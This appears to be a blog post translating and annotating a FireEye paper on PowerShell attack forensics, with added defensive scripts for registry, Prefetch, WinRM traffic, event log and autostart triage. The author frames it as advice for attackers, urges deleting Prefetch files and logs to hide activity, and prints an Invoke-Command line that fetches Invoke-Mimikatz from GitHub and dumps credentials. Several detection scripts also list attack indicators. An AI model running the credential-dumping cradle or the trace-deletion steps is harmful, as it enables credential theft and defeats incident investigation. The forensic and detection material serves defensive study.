Mickey · 2015/05/25 10:17

0x00 Introduction


This article is mainly about forensics. If I get better at it, I will also write about the practical use of PowerShell in intranet penetration. Almost all of the content here is translated from FireEye's <

>. I could not understand his article in many places and got through it with some stumbling. There are bound to be mistakes, so I also ask friends to add corrections.

As everyone knows, PowerShell 2.0 has shipped by default since Windows 7 and Windows Server 2008 R2, and Windows 8.1 and Windows Server 2012 R2 ship PowerShell 4.0. Attack frameworks written in PowerShell are now quite mature: Nishang's reverse shells over various protocols; PowerSploit's Invoke-Mimikatz, which loads Mimikatz reflectively in memory and dumps the plaintext credentials of logged-on accounts remotely without ever writing to disk; the PowerShell botnet Chris Campbell demonstrated at ShmooCon 2013; PowerView for enumerating Windows domain environments; and SET and Metasploit have also started to support PowerShell payloads. As attackers, we therefore also need to be familiar with the forensic techniques currently used against PowerShell, so that we can come and go without leaving a trace instead of getting caught.

The original article examines forensic evidence in the registry, Prefetch, network traffic, memory, event logs, and autostart locations.

0x01 Registry:


By default, the execution policy stored at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell (value ExecutionPolicy) is Restricted on every Windows version except Windows Server 2012 R2, where it is RemoteSigned. An attacker could set this value to Bypass so that scripts run, but this is rarely seen in practice; attackers instead launch powershell.exe with the -ExecutionPolicy Bypass option, which overrides the policy for that process only and leaves the registry untouched. Bear in mind that the execution policy is not a security boundary: it only governs whether .ps1 files are loaded, and commands passed on the command line or piped into powershell.exe run regardless. A modified registry value is therefore a useful indicator, but an unmodified one proves nothing.

0x02 Prefetch:


Prefetch exists to improve performance by speeding up the next load of an application; its default path is %SystemRoot%\Prefetch. Forensic examiners routinely use the *.pf files there to recover the last run time of a program and the list of files it accessed. By examining powershell.exe-59FC8F3D.pf an examiner can therefore find out which attack scripts you ran (the hash suffix is derived from the path of the executable, so the exact file name can differ between systems). I am using Prefetch Parser v1.4 here,

as shown in the figure:

So every time we finish using PowerShell, remember to del %SystemRoot%\Prefetch\powershell.exe-59FC8F3D.pf. Note, however, that the deletion is itself detectable: a missing .pf file for a program that demonstrably ran, the $MFT and $UsnJrnl records of the delete, and the EID 400 engine-start entries covered below all remain. Also note that Prefetch is disabled by default on Windows Server editions, so on servers the file usually does not exist in the first place.
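The following is an added example, not code from the original article or from FireEye's paper, that collects the artifacts of the registry (0x01) and Prefetch (0x02) sections from a live host in one pass: the ExecutionPolicy value in both hives, the command lines of running powershell.exe processes (where -ExecutionPolicy Bypass, -EncodedCommand or download cradles show up), and the Prefetch state and files. Function names, the indicator regex and the output layout are my own choices; it assumes PowerShell 3.0 or later and an elevated console.

```powershell
# Added example: triage of the registry, process and Prefetch artifacts described above.
# Not part of the original article. Assumes PowerShell 3.0+ (for [pscustomobject] and
# Get-CimInstance) running elevated so that all processes and HKLM are readable.

function Get-ExecutionPolicyArtifact {
    # Machine-wide policy lives under HKLM; a per-user override can live under HKCU.
    # An absent value means the built-in default applies (Restricted, or RemoteSigned on Server 2012 R2).
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell',
        'HKCU:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'
    )
    foreach ($key in $keys) {
        $value = (Get-ItemProperty -Path $key -Name ExecutionPolicy -ErrorAction SilentlyContinue).ExecutionPolicy
        [pscustomobject]@{
            Key        = $key
            Policy     = if ($value) { $value } else { '(not set, built-in default applies)' }
            Suspicious = @('Bypass', 'Unrestricted') -contains $value
        }
    }
}

function Get-PowerShellProcessArtifact {
    # Win32_Process exposes the full command line; this is where "-ExecutionPolicy Bypass"
    # (or any unambiguous prefix such as -ep / -exec), "-EncodedCommand", "-NoProfile"
    # and in-memory download cradles appear. The indicator regex is an assumption for illustration.
    $indicators = '(?i)-e\w*\s+bypass|-enc|-nop|downloadstring|\biex\b'
    Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" | ForEach-Object {
        [pscustomobject]@{
            ProcessId   = $_.ProcessId
            ParentId    = $_.ParentProcessId
            CommandLine = $_.CommandLine
            Suspicious  = [bool]($_.CommandLine -match $indicators)
        }
    }
}

function Get-PowerShellPrefetchArtifact {
    # Prefetch is on by default on client Windows and off by default on Server
    # (EnablePrefetcher = 0), so an absent .pf file does not prove PowerShell never ran.
    $pfParams = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters'
    $enabled  = (Get-ItemProperty -Path $pfParams -Name EnablePrefetcher -ErrorAction SilentlyContinue).EnablePrefetcher
    # The hash suffix depends on the executable path, so match any POWERSHELL.EXE-*.pf.
    $files = Get-ChildItem -Path "$env:SystemRoot\Prefetch" -Filter 'POWERSHELL.EXE-*.pf' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        EnablePrefetcher = $enabled
        Files            = @($files | Select-Object Name, CreationTime, LastWriteTime, Length)
    }
}

Get-ExecutionPolicyArtifact   | Format-Table -AutoSize
Get-PowerShellProcessArtifact | Format-List
Get-PowerShellPrefetchArtifact | Format-List
```

On a Windows 7 box still running PowerShell 2.0, replace Get-CimInstance with Get-WmiObject and build the objects with New-Object PSObject -Property; the logic is otherwise the same. The process check is the one that catches the -ExecutionPolicy Bypass case the text describes, since that option never touches the registry.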

0x03 Network Traffic:


When an attacker penetrates an intranet, the usual approach is to first obtain administrator rights on a workgroup machine, then move into a loosely configured domain environment and enable PowerShell remoting. PowerShell 2.0 remoting runs over WinRM, which listens on port 5985 (HTTP) and port 5986 (HTTPS) by default. Even on 5985 the WS-Management message bodies are encrypted with the negotiated Kerberos or NTLM session key unless AllowUnencrypted has been set, so a packet capture mostly yields metadata: which host talked to which, when, and over which port. For my part I still need to be familiar with the internal network and use remoting only where WinRM traffic already occurs as part of normal operations. I have no other ideas.
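The following is an added example, not from the original article or from FireEye's paper, of the network-side check a defender would run on the ports just mentioned: flag any connection to 5985/5986 whose source is not an approved administrative host. The flow records, IP addresses and allow-list are constructed for illustration; the function name and record fields are my own.

```powershell
# Added example: detect WinRM (PowerShell remoting) connections from unexpected sources.
# Not part of the original article. Flow records carry Source, Destination and DestinationPort;
# the sample data below is constructed, not a real capture.

function Find-WinRmConnection {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] $Flow,   # object with .Source .Destination .DestinationPort
        [string[]]$AllowedSources = @()                    # admin jump hosts that legitimately use remoting
    )
    process {
        $port = [int]$Flow.DestinationPort
        # WinRM defaults: 5985 = HTTP, 5986 = HTTPS. Everything else is ignored.
        if ($port -ne 5985 -and $port -ne 5986) { return }
        [pscustomobject]@{
            Source      = $Flow.Source
            Destination = $Flow.Destination
            Transport   = if ($port -eq 5986) { 'WinRM/HTTPS' } else { 'WinRM/HTTP' }
            # A remoting session from a host that is not on the allow-list is worth a look:
            # in this scenario the attacker remotes from a compromised workstation.
            Suspicious  = $AllowedSources -notcontains $Flow.Source
        }
    }
}

# Constructed sample flows: one from the (assumed) admin jump host 10.0.0.5, one from a
# workstation that has no business opening remoting sessions, one unrelated SMB flow.
$sampleFlows = @(
    [pscustomobject]@{ Source = '10.0.0.5';  Destination = '10.0.1.20'; DestinationPort = 5985 },
    [pscustomobject]@{ Source = '10.0.2.77'; Destination = '10.0.1.20'; DestinationPort = 5985 },
    [pscustomobject]@{ Source = '10.0.2.77'; Destination = '10.0.1.21'; DestinationPort = 445  }
)
$sampleFlows | Find-WinRmConnection -AllowedSources '10.0.0.5' | Format-Table -AutoSize

# Live view on the local host (Windows 8 / Server 2012 and later): an inbound remoting session
# shows up with LocalPort 5985/5986, so the peer's RemoteAddress is the Source of the flow.
Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
    Where-Object { $_.LocalPort -in 5985, 5986 } |
    ForEach-Object {
        [pscustomobject]@{ Source = $_.RemoteAddress; Destination = $_.LocalAddress; DestinationPort = $_.LocalPort }
    } |
    Find-WinRmConnection -AllowedSources '10.0.0.5' | Format-Table -AutoSize
```

In the constructed data only the 10.0.2.77 to 10.0.1.20 flow comes back as suspicious; the jump-host session is reported but not flagged, and the port 445 flow is dropped. Because the payload is encrypted, this source/destination view is about all a traffic capture will give you, which is exactly why the text recommends blending in with existing remoting traffic.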

0x04 Memory:


We can use the Volatility framework to examine the wsmprovhost.exe process (the host process WinRM spawns for a remoting session) and find the session data in XML form in its memory. For example, here he used an interactive PSSession shell to run `echo helloWord > c:\text.txt`, and the string can then be seen in the memory of wsmprovhost.exe, as shown in the picture:

This method stops working once the remote session ends, however: to collect such evidence, the examiner has to catch the attacker while the session is live, so I do not consider it a big threat to us. If WinRM is enabled, traces can also be found in the svchost.exe process that hosts the WinRM service. Here he demonstrates with Invoke-Mimikatz, downloaded and executed remotely in memory to dump plaintext passwords without writing anything to disk. This technique is very useful in real engagements:

```powershell
Invoke-Command -ComputerName 192.168.114.133 -ScriptBlock {
    IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'))
    Invoke-Mimikatz -DumpCreds
}
```

Here is what he found in the memory of svchost.exe:

0x05 Logs:


The default logging of PowerShell 2.0 is fairly weak, but it has improved since PowerShell 3.0. Whether a PowerShell script is run locally or through remoting, entries are written to the following three logs under %SystemRoot%\System32\winevt\Logs:

Windows PowerShell.evtx

Every PowerShell engine start is recorded as EID 400 and every engine stop as EID 403. The HostName field in these entries shows where the session came from: HostName=ConsoleHost means the engine was started from a local console, while HostName=ServerRemoteHost means it was started through PowerShell remoting.

Microsoft-Windows-PowerShell%4Operational.evtx

Microsoft-Windows-PowerShell%4Analytic.etl [I did not find this file on my machine.] Analytic logs are disabled by default, so the file only appears once that log has been enabled.

If remoting over WinRM is enabled, the following two logs are also generated:

Microsoft-Windows-WinRM%4Operational.evtx

EID 6 ("Creating WSMan Session") is written on the system that opens the session and records the connection string, i.e. the address of the remote host it connected to, so from it you can see which remoting targets a machine reached out to. On the accessed system, EID 169 records the account that authenticated and the mechanism (Kerberos or NTLM) it used.

Microsoft-Windows-WinRM%4Analytic.etl

EID 32850 records the account the remoting client authenticated with, and EID 32867/32868 can show the details of the Invoke-Command execution (the raw WS-Management request and response), as shown in the figure below.
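The following is an added example, not from the original article or from FireEye's paper, that pulls the session-level evidence just described out of the live event logs: EID 400/403 from "Windows PowerShell" with the HostName classified as local console or remoting, and EID 6 from Microsoft-Windows-WinRM/Operational with the destination it recorded. The regexes assume the message texts contain "HostName=..." and "connection string is: ..." as they do on the builds I know; function names and the output layout are my own.

```powershell
# Added example: extract who-started-what session evidence from the two logs discussed above.
# Not part of the original article. Assumes PowerShell 3.0+ and read access to the logs.

function Get-PowerShellSessionEvent {
    param([int]$Days = 7)
    $filter = @{
        LogName   = 'Windows PowerShell'
        Id        = 400, 403                       # 400 = engine start, 403 = engine stop
        StartTime = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # The message body is a list of "Name=Value" lines; HostName is the one that matters here.
        $hostName = if ($_.Message -match 'HostName=([^\r\n]+)') { $Matches[1].Trim() } else { '' }
        [pscustomobject]@{
            Time     = $_.TimeCreated
            Event    = if ($_.Id -eq 400) { 'EngineStart' } else { 'EngineStop' }
            HostName = $hostName
            # ConsoleHost = interactive console on this machine,
            # ServerRemoteHost = session created through PowerShell remoting.
            Remote   = ($hostName -eq 'ServerRemoteHost')
        }
    }
}

function Get-WinRmSessionEvent {
    param([int]$Days = 7)
    $filter = @{
        LogName   = 'Microsoft-Windows-WinRM/Operational'
        Id        = 6                              # "Creating WSMan Session", logged on the initiating host
        StartTime = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # The connection string names the remote destination, e.g. 192.168.114.133/wsman?PSVersion=...
        $target = if ($_.Message -match 'connection string is:\s*(\S+)') { $Matches[1] } else { $_.Message }
        [pscustomobject]@{
            Time   = $_.TimeCreated
            User   = $_.UserId                    # SID of the account that opened the session
            Target = $target
        }
    }
}

# Remoting sessions received by this host, and remoting sessions this host opened elsewhere.
Get-PowerShellSessionEvent | Where-Object { $_.Remote } | Format-Table -AutoSize
Get-WinRmSessionEvent | Format-Table -AutoSize
```

Run on the machine from which the Invoke-Command in 0x04 was issued, the second function returns the 192.168.114.133 target; run on 192.168.114.133 itself, the first function shows the matching EID 400 with HostName=ServerRemoteHost. The two views together are what lets an examiner tie a remoting session to both ends.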

In addition, with AppLocker Microsoft gave administrators a further way to control PowerShell scripts: which .ps1 files are allowed to run, which are denied, or even denying every script on the machine. There are known techniques to bypass this, which I will cover in a later post. When AppLocker is enabled, script executions are recorded in the Microsoft-Windows-AppLocker/MSI and Script log as EID 8005 (script allowed to run) and EID 8006 (script would have been blocked if the policy were enforced, i.e. audit mode).

Administrators can also use the global profile %windir%\System32\WindowsPowerShell\v1.0\profile.ps1 to add logging of their own. How to spot that is not covered again here. One caveat for both sides: starting powershell.exe with -NoProfile skips every profile script, so logging that lives only in a profile is trivially avoided.

PowerShell 3.0 introduced Module Logging, which can be enabled through Group Policy (Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell → Turn on Module Logging). With it enabled, the commands a script executes and their parameter bindings are recorded as EID 4103 in Microsoft-Windows-PowerShell/Operational. For example, if I run

```powershell
Get-ChildItem c:\temp -Filter *.txt -Recurse | Select-String password
```

the corresponding EID 4103 entries are produced, as shown in the figure.

Even the execution of Invoke-Mimikatz is recorded, as shown:
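The following is an added example, not from the original article or from FireEye's paper, of what a defender does with Module Logging once it is on: scan EID 4103 records for the activity shown above (the in-memory download cradle, Invoke-Mimikatz, the password search) and pull the user and command out of the ContextInfo block. The indicator list is an assumption for illustration, the "User = " and "Command Name = " field names are those of the 4103 message text, and the function name is my own.

```powershell
# Added example: hunt Module Logging records (EID 4103) for the commands demonstrated above.
# Not part of the original article. Assumes PowerShell 3.0+ with Module Logging enabled
# (or an exported .evtx passed in through -Events).

# Indicator strings; an assumption for illustration, extend for your own environment.
$Indicators = @(
    'Invoke-Mimikatz', 'DumpCreds', 'DownloadString', 'Net.WebClient',
    'Invoke-Expression', 'IEX', 'FromBase64String', 'Select-String password'
)

function Find-SuspiciousModuleLog {
    param(
        [int]$Days = 7,
        [string[]]$Patterns = $Indicators,
        # Pre-collected records (e.g. Get-WinEvent -Path .\export.evtx) for offline analysis;
        # when omitted, the live Operational log is queried.
        [System.Diagnostics.Eventing.Reader.EventRecord[]]$Events
    )
    if (-not $Events) {
        $filter = @{
            LogName   = 'Microsoft-Windows-PowerShell/Operational'
            Id        = 4103
            StartTime = (Get-Date).AddDays(-$Days)
        }
        $Events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    }
    # One case-insensitive regex built from the escaped indicators, so "Net.WebClient" matches literally.
    $regex = '(?i)' + (($Patterns | ForEach-Object { [regex]::Escape($_) }) -join '|')
    foreach ($e in $Events) {
        if ($e.Message -notmatch $regex) { continue }
        # The ContextInfo block of a 4103 record carries "User = DOMAIN\name" and "Command Name = ...".
        $user = if ($e.Message -match 'User = ([^\r\n]+)')         { $Matches[1].Trim() } else { '' }
        $cmd  = if ($e.Message -match 'Command Name = ([^\r\n]+)') { $Matches[1].Trim() } else { '' }
        [pscustomobject]@{
            Time    = $e.TimeCreated
            User    = $user
            Command = $cmd
            Matched = @([regex]::Matches($e.Message, $regex) | ForEach-Object { $_.Value } | Sort-Object -Unique)
        }
    }
}

Find-SuspiciousModuleLog | Format-List
```

Against the 4103 entries produced by the Invoke-Command in 0x04 this returns the remote user and the Invoke-Mimikatz and DownloadString hits; against the Select-String example above it matches "Select-String password". Because Module Logging records the commands a script issues rather than the script text, obfuscating the script file does not help an attacker once the commands actually execute.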

Once again: logs that should be deleted must be deleted. There should be a tool out there that can delete specific log entries, but I have not seen one; if you have one, please send me a copy. Clearing a whole log is itself logged (EID 1102 in the Security log, EID 104 in the System log for the other logs), so that is not a quiet alternative.

0x06 Autostart:


PowerShell persistence is usually set up through the registry Run keys, the Start Menu Startup folder or scheduled tasks, all of which are normally found with Sysinternals Autoruns. In addition, the per-user profile C:\Users\<username>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 runs every time that user starts PowerShell, and the global profile C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 has the same effect for every user, so both can be used as autostart locations.
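The following is an added example, not from the original article or from FireEye's paper, that enumerates the PowerShell autostart locations just listed without Autoruns: Run/RunOnce keys in both hives, the two Startup folders, scheduled-task actions that launch powershell.exe, and all four profile scripts PowerShell consults (the two named in the text plus the host-specific variants). The function name and output shape are my own; it assumes Windows 8 / Server 2012 or later for Get-ScheduledTask and PowerShell 4.0 for Get-FileHash.

```powershell
# Added example: find PowerShell autostart entries in the locations discussed above.
# Not part of the original article. Assumes PowerShell 4.0+ on Windows 8 / Server 2012 or later.

function Get-PowerShellAutostart {
    # Run / RunOnce keys in both hives: any value mentioning powershell or a .ps1 file.
    $runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($key in $runKeys) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }          # skip PSPath, PSParentPath, PSDrive, ...
            if ("$($p.Value)" -match '(?i)powershell|\.ps1') {
                [pscustomobject]@{ Type = 'RunKey'; Location = "$key\$($p.Name)"; Detail = $p.Value }
            }
        }
    }

    # Startup folders: every file is listed, because a .lnk or .bat there can wrap a PowerShell call.
    $startupDirs = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
                   "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    foreach ($dir in $startupDirs) {
        foreach ($f in (Get-ChildItem -Path $dir -File -ErrorAction SilentlyContinue)) {
            [pscustomobject]@{ Type = 'StartupFolder'; Location = $f.FullName; Detail = $f.LastWriteTime }
        }
    }

    # Scheduled tasks whose action executes powershell (Execute is empty for COM-handler actions).
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($a in $task.Actions) {
            $cmdline = "$($a.Execute) $($a.Arguments)"
            if ($cmdline -match '(?i)powershell') {
                [pscustomobject]@{ Type = 'ScheduledTask'; Location = "$($task.TaskPath)$($task.TaskName)"; Detail = $cmdline }
            }
        }
    }

    # Profile scripts. $PROFILE carries all four paths; the global profile.ps1 and the per-user
    # Microsoft.PowerShell_profile.ps1 from the text are AllUsersAllHosts and CurrentUserCurrentHost.
    $profilePaths = $PROFILE.AllUsersAllHosts, $PROFILE.AllUsersCurrentHost,
                    $PROFILE.CurrentUserAllHosts, $PROFILE.CurrentUserCurrentHost
    foreach ($path in $profilePaths) {
        if (Test-Path -Path $path) {
            $hash = (Get-FileHash -Path $path -Algorithm SHA256).Hash
            [pscustomobject]@{ Type = 'Profile'; Location = $path; Detail = "SHA256 $hash" }
        }
    }
}

Get-PowerShellAutostart | Format-Table -AutoSize
```

The profile hashes are there so that a baseline can be compared over time; a profile.ps1 that appears or changes on a server is a strong signal, since administrators rarely touch that file. Because profiles only run for users who start PowerShell without -NoProfile, they are a quieter but less reliable persistence point than a scheduled task.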

References:

https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf

https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf